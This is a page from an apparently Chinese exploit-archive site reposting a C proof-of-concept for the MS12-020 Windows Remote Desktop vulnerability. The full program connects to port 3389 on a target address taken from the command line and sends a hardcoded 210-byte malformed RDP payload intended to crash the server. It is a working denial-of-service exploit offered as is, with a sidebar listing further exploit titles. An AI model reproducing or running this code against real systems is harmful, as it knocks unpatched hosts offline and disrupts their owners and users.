MS12-020 DoS PoC (210 byte payload）

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

MS12-020 DoS PoC (210 byte payload）

来源：vfocus.net 作者：vfocus 发布时间：2012-03-19

#include "stdio.h"
#include "winsock2.h"
#pragma comment(lib, "ws2_32.lib")

const char hexData[210] =
{
    0x03, 0x00, 0x00, 0x13, 0x0E, 0xE0, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x01, 0x00, 0x08, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x6A, 0x02,
    0xF0, 0x80, 0x7F, 0x65, 0x82, 0x00, 0x5E, 0x04,
    0x01, 0x01, 0x04, 0x01, 0x01, 0x01, 0x01, 0xFF,
    0x30, 0x19, 0x02, 0x01, 0xFF, 0x02, 0x01, 0xFF,
    0x02, 0x01, 0x00, 0x02, 0x01, 0x01, 0x02, 0x01,
    0x00, 0x02, 0x01, 0x01, 0x02, 0x02, 0x00, 0x7C,
    0x02, 0x01, 0x02, 0x30, 0x19, 0x02, 0x01, 0xFF,
    0x02, 0x01, 0xFF, 0x02, 0x01, 0x00, 0x02, 0x01,
    0x01, 0x02, 0x01, 0x00, 0x02, 0x01, 0x01, 0x02,
    0x02, 0x00, 0x7C, 0x02, 0x01, 0x02, 0x30, 0x19,
    0x02, 0x01, 0xFF, 0x02, 0x01, 0xFF, 0x02, 0x01,
    0x00, 0x02, 0x01, 0x01, 0x02, 0x01, 0x00, 0x02,
    0x01, 0x01, 0x02, 0x02, 0x00, 0x7C, 0x02, 0x01,
    0x02, 0x04, 0x82, 0x00, 0x00, 0x03, 0x00, 0x00,
    0x08, 0x02, 0xF0, 0x80, 0x28, 0x03, 0x00, 0x00,
    0x08, 0x02, 0xF0, 0x80, 0x28, 0x03, 0x00, 0x00,
    0x08, 0x02, 0xF0, 0x80, 0x28, 0x03, 0x00, 0x00,
    0x08, 0x02, 0xF0, 0x80, 0x28, 0x03, 0x00, 0x00,
    0x08, 0x02, 0xF0, 0x80, 0x28, 0x03, 0x00, 0x00,
    0x08, 0x02, 0xF0, 0x80, 0x28, 0x03, 0x00, 0x00,
    0x08, 0x02, 0xF0, 0x80, 0x28, 0x03, 0x00, 0x00,
    0x08, 0x02, 0xF0, 0x80, 0x28, 0x03, 0x00, 0x00,
    0x0C, 0x02, 0xF0, 0x80, 0x38, 0x00, 0x06, 0x03,
    0xF0, 0x03, 0x00, 0x00, 0x09, 0x02, 0xF0, 0x80,
    0x21, 0x80
};

int
main(int argc, char* argv[])
{
    WSADATA wsaData;
    SOCKET hSocket;
    struct sockaddr_in victim;
    int result;
    printf("MS12-020 DoS PoC (210 byte payload)\n");
    printf("by Alex Ionescu (@aionescu)\n");
    printf("based on jduck Ruby PoC and Luigi's MSRC PoC\n");
    WSAStartup(MAKEWORD(2, 2), &wsaData);

    hSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    printf("Created socket 0x%lx\n", hSocket);
    if (hSocket == 0) return;

    victim.sin_family = AF_INET;
    victim.sin_port = htons(3389);
    victim.sin_addr.s_addr = inet_addr(argv[1]);
    printf("Connecting to %s...\n", argv[1]);

    result = connect(hSocket, (SOCKADDR*)&victim, sizeof(victim));
    if (result != 0) return;

    printf("Sending payload of 0x%lx bytes\n", sizeof(hexData));
    result = send(hSocket, hexData, sizeof(hexData), 0);
    printf("Sent 0x%lx bytes to server\n", result);

    closesocket(hSocket);
    return 0;
}

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告